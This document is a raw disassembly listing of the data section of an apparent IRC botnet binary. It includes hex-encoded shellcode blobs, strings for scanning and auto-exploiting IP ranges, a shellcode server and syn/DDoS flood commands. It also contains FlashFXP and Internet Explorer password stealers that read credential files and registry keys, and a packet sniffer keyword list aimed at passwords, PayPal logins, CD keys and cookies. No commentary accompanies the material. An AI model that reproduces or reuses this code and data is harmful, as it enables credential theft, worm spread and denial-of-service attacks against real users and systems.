dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset dword_41CCB8 ; DATA XREF: sub_4127D0+77�r
dd offset dword_41CCAC
dd 0
dd offset loc_41CC94
dd offset dword_41CC88
align 8
dd offset byte_41CC70
dd offset dword_41CC64
dd 0
dd offset dword_41CC4C
dd offset nullsub_1
align 10h
dd offset dword_41CC2C
dd offset nullsub_2
dd 0
dd offset dword_41CC00
dd offset dword_41CBF4
dd 4 dup(0)
dword_41CBF4 dd 9280C5C1h, 2 dup(0) ; .packed:0041DB18�o
dword_41CC00 dd 0C2DC809Fh, 0BC928BACh, 0FE92A3A5h, 0FCDDE8AAh, 0DCDB909Ah
; DATA XREF: .packed:0041CBDC�o
; .packed:0041DB14�o
dd 0F794C4ABh, 0BFh, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
db 0C7h, 8Ah, 98h
dd 2 dup(0)
dword_41CC2C dd 85D19793h, 0FA8982B7h, 0B9CDA6B8h, 0C2EEBDh, 0
; DATA XREF: .packed:0041CBD0�o
; .packed:0041DB08�o
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
db 99h
dd 2 dup(0)
dword_41CC4C dd 0DFD79C98h, 0FD89C4ADh, 0F380A6A2h, 0F681E7ACh, 989Dh
; DATA XREF: .packed:0041CBC4�o
; .packed:0041DAFC�o
dd 0
dword_41CC64 dd 9B86C7C1h, 2 dup(0) ; .packed:0041DAF4�o
byte_41CC70 db 90h ; DATA XREF: .packed:0041CBB8�o
; .packed:0041DAF0�o
db 81h, 0DBh, 85h
dd 0F3938FB4h, 0F891B1A3h, 0F0C1AFBAh, 86h, 0
dword_41CC88 dd 9284C0C0h, 2 dup(0) ; .packed:0041DAE8�o
; ---------------------------------------------------------------------------
loc_41CC94: ; DATA XREF: .packed:0041CBAC�o
; .packed:0041DAE4�o
xchg eax, esi
pushf
rcr bh, 0A7h
les ebx, [edi-63585C05h]
jmp fword ptr [esp-656E4464h]
; ---------------------------------------------------------------------------
dw 0DFh
dd 0
dword_41CCAC dd 9E85C0C5h, 2 dup(0) ; .packed:off_41DADC�o
dword_41CCB8 dd 0D8C18080h, 0F0D48BB7h, 0FC96A3A7h, 0FDCAE8AAh, 0C8D69781h
; DATA XREF: .packed:off_41CBA0�o
; .packed:off_41DAD8�o
dd 0FD99C4ADh, 0A6h, 0
dword_41CCD8 dd 72h dword_41CCDC dd 62h dword_41CCE0 dd 63h dword_41CCE4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_412E04+64�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CD1C dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2
byte_41CD40 db 96h ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
db 96h, 0DDh, 0C6h
dd 0ECh, 2 dup(0)
dd 0C3000000h, 87C6h, 3 dup(0)
db 2 dup(0)
dword_41CD66 dd 7CF0E208h ; sub_412FC6+31�r ...
dword_41CD6A dd 0 ; sub_414052+B5�r ...
off_41CD6E dd offset sub_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 909C0000h, 9EBFDBC6h, 92h, 2 dup(0)
dd 87C1C600h, 4 dup(0)
dd 0AC8393C4h, 0
dd offset sub_410B52
dd 3, 10h dup(0)
dword_41CDF0 dd 6E695728h, 293233hdword_41CDF8 dd 696E5528h, 2978hdword_41CE00 dd 63617041h, 252F6568h, 75haApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 4
unk_41CE58 db 53h ; S ; DATA XREF: sub_41349C+5E4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CE9C dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_41349C+55E�o
dword_41CEB0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_41349C+343�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CEE8 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_41349C+305�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CF14 db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CF4C dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_413CB3+30E�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CF90 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_413CB3+2B0�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41CFC0 db 2Dh ; - ; DATA XREF: sub_413CB3+31�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41D014 dd 3003203Ah, 75250234h, 202E0203h, 0aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_414052+29�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 4
dword_41D058 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_4141C1+D8�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41D088 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_4141C1+B4�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D0C0 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_4141C1+78�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D0F0 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D110 db 53h ; S ; DATA XREF: sub_4143B0+221�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D14C dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_4143B0+1BA�o
dword_41D160 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_4143B0+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D1A8 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D29C db 2Dh ; - ; DATA XREF: sub_414A1E+464�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_41D2D8 dd 2343003h, 2037525ha_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+352�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+338�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+31E�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+304�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_41D344 db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: sub_414A1E+2EA�o
align 10h
aPass_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1F4�o
db 'Pass=',0
aUser_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1DC�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: sub_414A1E+1C4�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: sub_414A1E+1AC�o
db 'IP=',0
align 10h
asc_41D370 db 0Dh,0Ah ; DATA XREF: sub_414A1E:loc_414BA6�o
db 0Dh,0Ah
db '[',0
align 4
unk_41D378 db 2Dh ; - ; DATA XREF: sub_414A1E+55�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
unk_41D3BC db 2Dh ; - ; DATA XREF: sub_414EF4+B8A�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 4
dword_41D3F8 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_414EF4+AD8�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_41D454 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_414EF4+A2B�o
dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41D49C dd 70747468h, 2F3A73hdword_41D4A4 dd 70747468h, 2F3Ahdword_41D4AC dd 7274533Ah, 676E69h ; sub_414EF4+99A�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_414EF4+968�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_414EF4:loc_415842�o
align 4
dword_41D4CC dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_414EF4+935�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_41D50C dd 2Ch ; sub_414EF4+852�o ...
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_414EF4:loc_4155CE�o
align 4
dword_41D51C dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_414EF4+6C6�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_414EF4:loc_41550C�o
align 10h
dword_41D580 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_414EF4+604�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_414EF4+5C2�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_414EF4+41C�o
asc_41D5D0 db '%x',0 ; DATA XREF: sub_414EF4+234�o
align 4
unk_41D5D4 db 2Dh ; - ; DATA XREF: sub_414EF4+1A9�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 8
dword_41D608 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_414EF4+2C7�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D63C dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_415B60+277�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_415B60+149�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_415B60+10A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_415B60:loc_415C2F�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_415B60:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_415B60+8C�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D76C dd offset aUser_1 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_2 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_1 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_41D7C8 dd offset aLogin_0 ; DATA XREF: sub_415EB7+54�o
; "login "
dd 0
dd offset aSxt ; "sxt "
align 8
dd offset aAuth ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey_0 ; "cd-key"
align 8
dd offset aCdKey ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
align 10h
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
align 10h
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D83C dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_41D880 dd offset dword_41D8DC ; DATA XREF: sub_415EB7+98�o
align 8
dd offset dword_41D8D4
dd 0
dd offset dword_41D8CC
align 8
dd offset dword_41D8C4
align 10h
dd offset dword_41D8BC
align 8
dd offset dword_41D8B4
dd 2 dup(0)
dword_41D8B4 dd 54495551h, 20hdword_41D8BC dd 54524150h, 20hdword_41D8C4 dd 4E494F4Ah, 20hdword_41D8CC dd 49504F54h, 2043hdword_41D8D4 dd 49544F4Eh, 204543hdword_41D8DC dd 56495250h, 2047534Dh, 0aDdos db 'ddos',0 ; DATA XREF: .packed:0041D874�o
align 10h
aServu db 'servu',0 ; DATA XREF: .packed:0041D86C�o
align 4
aServU db 'serv u',0 ; DATA XREF: .packed:0041D864�o
align 10h
aServU_0 db 'serv-u',0 ; DATA XREF: .packed:0041D85C�o
align 4
aClone db 'clone ',0 ; DATA XREF: .packed:0041D854�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: .packed:0041D84C�o
align 4
aSyn db 'syn',0 ; DATA XREF: .packed:0041D844�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: .packed:off_41D83C�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: .packed:0041D830�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: .packed:0041D828�o
aLP db 'l/p',0 ; DATA XREF: .packed:0041D820�o
aIrcOperator db 'irc operator',0 ; DATA XREF: .packed:0041D818�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: .packed:0041D810�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: .packed:0041D808�o
align 4
aCdKey db 'cd key',0 ; DATA XREF: .packed:0041D7F8�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: .packed:0041D7F0�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: .packed:0041D7E8�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: .packed:0041D7E0�o
align 4
aAuth db 'auth ',0 ; DATA XREF: .packed:0041D7D8�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: .packed:0041D7D0�o
align 4
aLogin_0 db 'login ',0 ; DATA XREF: .packed:off_41D7C8�o
align 10h
aPw db 'pw=',0 ; DATA XREF: .packed:0041D7BC�o
aPass_1 db 'pass=',0 ; DATA XREF: .packed:0041D7B4�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: .packed:0041D7AC�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: .packed:0041D7A4�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: .packed:0041D79C�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: .packed:0041D794�o
aAuth_0 db ' :auth ',0 ; DATA XREF: .packed:0041D78C�o
aIdentify db 'identify ',0 ; DATA XREF: .packed:0041D784�o
align 4
aOper db 'oper ',0 ; DATA XREF: .packed:0041D77C�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: .packed:0041D778�o
align 4
aPass_2 db 'pass ',0 ; DATA XREF: .packed:0041D774�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: .packed:0041D770�o
align 10h
aUser_1 db 'user ',0 ; DATA XREF: .packed:off_41D76C�o
align 4
dword_41DA18 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_415F69+5CE�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41DA4C db 2Dh ; - ; DATA XREF: sub_415F69+1A6�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_41DA80 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DAA4h, 0C7DD9A82h, 0E28E84F0h
dd 0F087ADE5h, 2 dup(0)
dword_41DAB8 dd 2AACBFA2h ; .packed:00416845�r ...
dword_41DABC dd 0DF37146Ch dword_41DAC0 dd 0FD4BB512h dword_41DAC4 dd 566C6C0h align 10h
off_41DAD0 dd offset dword_41DDCC ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
align 8
off_41DAD8 dd offset dword_41CCB8 ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DADC dd offset dword_41CCAC ; DATA XREF: sub_40CF2F+B8�r
dword_41DAE0 dd 0 ; sub_40CF2F+DF�r
dd offset loc_41CC94
dd offset dword_41CC88
align 10h
dd offset byte_41CC70
dd offset dword_41CC64
dd 0
dd offset dword_41CC4C
dd offset nullsub_1
align 8
dd offset dword_41CC2C
dd offset nullsub_2
dd 0
dd offset dword_41CC00
dd offset dword_41CBF4
dd 4 dup(0)
dword_41DB2C dd 948DCACDh, 0ADC5D5E1h, 2 dup(0) ; sub_40D871:loc_40DCB8�o
dword_41DB3C dd 75722323h, 61697373h, 2323h, 1Dh dup(0) ; sub_4093B6+6C�o ...
byte_41DBBC db 0D1h ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 0D6h, 0D1h, 0C4h
dd 0F0979FB2h, 0B4D6A3A2h, 1Dh dup(0)
byte_41DC3C db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 10h
dd 1Fh dup(0)
dword_41DCBC dd 3430032Eh, 2036202h, 0 ; sub_40D871+242�o
dword_41DCC8 dd 0C8D09085h, 0BCC8D9B2h, 99AEAFh, 3Eh dup(0) ; sub_406AE7+2E�o
dword_41DDCC dd 0DEC0B5D8h, 0F39399ADh, 0F698ECA5h, 0CEE8B8h, 0
; DATA XREF: .packed:off_41DAD0�o
dword_41DDE0 dd 3430032Dh, 62656402h, 2036775haEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 10h
aEntry db 'entry',0 ; DATA XREF: .packed:00416AE7�o
align 4
aLoop db 'loop',0 ; DATA XREF: .packed:loc_416AC5�o
align 10h
aPing08x db 'PING :%08X',0 ; DATA XREF: .packed:00416A54�o
align 4
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: .packed:0041684B�o
align 10h
dword_41DE60 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_41DE70 dd offset off_4172BC ; DATA XREF: .packed:off_4172C0�o
; .packed:004172FC�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
off_41DE90 dd offset off_4172BC ; DATA XREF: .packed:off_417308�o
; .packed:00417344�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DEA8 dd 0 ; sub_401856+21�r ...
dword_41DEAC dd 0 ; sub_401856+36�r ...
dword_41DEB0 dd 0 ; sub_401856+4B�r ...
dword_41DEB4 dd 0 ; sub_401856+C�r ...
dd 0
dword_41DEBC dd 0 ; sub_4018AF+62�r ...
byte_41DEC0 db 0 ; DATA XREF: sub_401981+1BA�o
; sub_402A32+57�r ...
align 8
dword_41DEC8 dd 0 ; sub_404CBB+1B�r ...
dword_41DECC dd 1 dword_41DED0 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_409C36+12�r ...
align 8
dword_41DED8 dd 5B86A313h dword_41DEDC dd 5B86D617h dword_41DEE0 dd 5B86FD69h dword_41DEE4 dd 5B894541h dword_41DEE8 dd 5B868E65h dword_41DEEC dd 5B8A3009h dword_41DEF0 dd 5B867750h dword_41DEF4 dd 5B897BE9h dword_41DEF8 dd 5B8A5DD1h dword_41DEFC dd 71B2517Fh dword_41DF00 dd 71B2578Ch dword_41DF04 dd 71B2547Ah dword_41DF08 dd 71B25099h dword_41DF0C dd 42C5AE03h ; resolved to->WININET.InternetGetConnectedStateExA ; sub_408B30+118�r ...
dword_41DF10 dd 5E0C53F7h ; sub_414EF4+6C�r ...
dword_41DF14 dd 71AB2A6Fh ; resolved to->WS2_32.getaddrinfo ; sub_403BD3+197�r ...
dword_41DF18 dd 71ABC671h ; resolved to->WS2_32.getnameinfo ; sub_403BD3+17F�w ...
dword_41DF1C dd 71AB2B0Bh ; resolved to->WS2_32.freeaddrinfo ; sub_403BD3+1A9�r ...
dd 101h dup(0)
dword_41E324 dd 0 ; sub_4042FB+20�o
dword_41E328 dd 0 ; sub_4042FB:loc_404327�r
align 10h
dword_41E330 dd 76BF1F1Ch ; sub_405FA3+7A�r ...
dword_41E334 dd 76BF2075h ; sub_405FA3+83�r ...
